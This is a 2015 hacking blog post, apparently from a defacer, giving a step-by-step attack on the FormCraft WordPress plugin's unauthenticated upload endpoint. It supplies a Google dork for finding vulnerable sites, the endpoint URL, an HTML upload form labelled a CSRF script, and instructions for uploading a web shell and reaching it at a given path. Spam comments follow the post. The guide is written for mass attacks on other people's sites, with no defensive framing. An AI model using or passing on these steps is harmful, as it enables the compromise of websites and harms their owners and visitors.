It's All About Hacking: WordPress Plugins FormCraft CSRF Vulnerability

Saturday, 14 February 2015

WordPress Plugins FormCraft CSRF Vulnerability

Dork : Inurl:/wp-content/plugins/formcraft/

Exploit : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php

http://site.com/wp-content/plugins/formcraft/file-upload/server/php/

Script CSRF:

<form method="POST" action="http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>

*Save In HTML File*

1.Find Target Using Dork Given

2.Then Put Exploit Given

3.If Vuln , It Will Show "No File Upload : 2"

4.Put That Vuln Site At CSRF Script
5.Open The HTML File Using Your Default Browser And Upload Your Shell

Shell Access : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/files/yourshell.php

Inbox Me If You Not Understand

Facebook : www.fb.com/7OBUz

Twitter : www.twitter.com/wazy_MY

Thx To Indonesian CyberFreedom Team

3 comments:

Ameen KhatriWednesday, May 23, 2018
I found Hubwit as a transparent s ite, a social hub which is a conglomerate of Buyers and Sellers who are ready to offer online digital consultancy at decent cost. wordpress autoblog setup
ReplyDelete
Replies
WelderReview.comMonday, July 22, 2019

Hello,

we provide affordable and result-oriented SEO services, please give a chance to serve you.

Thanks
Admin: E07.net
ReplyDelete
Replies
AdminMonday, March 16, 2020
How to Add Download Wait Countdown Page in WordPress
ReplyDelete
Replies

Add comment